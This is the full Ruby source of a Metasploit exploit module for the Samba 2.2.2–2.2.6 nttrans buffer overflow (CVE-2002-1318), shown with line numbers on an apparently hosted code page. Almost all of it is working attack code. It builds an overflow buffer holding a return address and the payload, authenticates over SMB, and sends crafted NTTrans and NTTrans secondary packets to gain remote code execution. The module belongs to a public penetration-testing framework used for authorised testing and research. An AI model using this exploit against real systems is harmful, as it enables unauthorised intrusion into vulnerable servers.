Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::SMB::Client
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',
14
      'Description'    => %q{
15
          This module attempts to exploit a buffer overflow vulnerability present in
16
        versions 2.2.2 through 2.2.6 of Samba.
17

18
        The Samba developers report this as:
19
        "Bug in the length checking for encrypted password change requests from clients."
20

21
        The bug was discovered and reported by the Debian Samba Maintainers.
22
      },
23
      'Author'         => [ 'hdm' ],
24
      'License'        => MSF_LICENSE,
25
      'References'     =>
26
        [
27
          [ 'CVE', '2002-1318' ],
28
          [ 'OSVDB', '14525' ],
29
          [ 'BID', '6210' ],
30
          [ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]
31
        ],
32
      'Privileged'     => true,
33
      'Platform'       => 'linux',
34
      'Payload'        =>
35
        {
36
          'Space'    => 1024,
37
          'BadChars' => "\x00",
38
          'MinNops'  => 512,
39
        },
40
      'Targets'        =>
41
        [
42
          [ "Samba 2.2.x Linux x86",
43
            {
44
              'Arch' => ARCH_X86,
45
              'Platform' => 'linux',
46
              'Rets' => [0x01020304, 0x41424344],
47
            },
48
          ],
49
        ],
50
      'DisclosureDate' => '2003-04-07'
51
      ))
52

53
    register_options(
54
      [
55
        Opt::RPORT(139)
56
      ])
57

58
    deregister_options('SMB::ProtocolVersion')
59
  end
60

61
  def exploit
62

63
    # 0x081fc968
64

65
    pattern = Rex::Text.pattern_create(12000)
66

67
    pattern[532, 4] = [0x81b847c].pack('V')
68
    pattern[836, payload.encoded.length] = payload.encoded
69

70
    # 0x081b8138
71

72
    connect(versions: [1])
73
    smb_login
74

75
    targ_address = 0xfffbb7d0
76

77
    #
78
    # Send a NTTrans request with ParameterCountTotal set to the buffer length
79
    #
80

81
    subcommand   = 1
82
    param        = ''
83
    body         = ''
84
    setup_count  = 0
85
    setup_data   = ''
86
    data = param + body
87

88
    pkt = CONST::SMB_NTTRANS_PKT.make_struct
89
    self.simple.client.smb_defaults(pkt['Payload']['SMB'])
90

91
    base_offset = pkt.to_s.length + (setup_count * 2) - 4
92
    param_offset = base_offset
93
    data_offset = param_offset + param.length
94

95
    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
96
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
97
    pkt['Payload']['SMB'].v['Flags2'] = 0x2001
98
    pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count
99

100
    pkt['Payload'].v['ParamCountTotal'] =12000
101
    pkt['Payload'].v['DataCountTotal'] = body.length
102
    pkt['Payload'].v['ParamCountMax'] = 1024
103
    pkt['Payload'].v['DataCountMax'] = 65504
104
    pkt['Payload'].v['ParamCount'] = param.length
105
    pkt['Payload'].v['ParamOffset'] = param_offset
106
    pkt['Payload'].v['DataCount'] = body.length
107
    pkt['Payload'].v['DataOffset'] = data_offset
108
    pkt['Payload'].v['SetupCount'] = setup_count
109
    pkt['Payload'].v['SetupData'] = setup_data
110
    pkt['Payload'].v['Subcommand'] = subcommand
111

112
    pkt['Payload'].v['Payload'] = data
113

114
    self.simple.client.smb_send(pkt.to_s)
115
    ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)
116

117
    #
118
    # Send a NTTrans secondary request with the magic displacement
119
    #
120

121
    param = pattern
122
    body  = ''
123
    data  = param + body
124

125
    pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
126
    self.simple.client.smb_defaults(pkt['Payload']['SMB'])
127

128
    base_offset = pkt.to_s.length - 4
129
    param_offset = base_offset
130
    data_offset = param_offset + param.length
131

132
    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
133
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
134
    pkt['Payload']['SMB'].v['Flags2'] = 0x2001
135
    pkt['Payload']['SMB'].v['WordCount'] = 18
136

137
    pkt['Payload'].v['ParamCountTotal'] = param.length
138
    pkt['Payload'].v['DataCountTotal'] = body.length
139
    pkt['Payload'].v['ParamCount'] = param.length
140
    pkt['Payload'].v['ParamOffset'] = param_offset
141
    pkt['Payload'].v['ParamDisplace'] = targ_address
142
    pkt['Payload'].v['DataCount'] = body.length
143
    pkt['Payload'].v['DataOffset'] = data_offset
144

145
    pkt['Payload'].v['Payload'] = data
146

147
    self.simple.client.smb_send(pkt.to_s)
148
    ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)
149

150

151
    handler
152

153
  end
154
end
155

156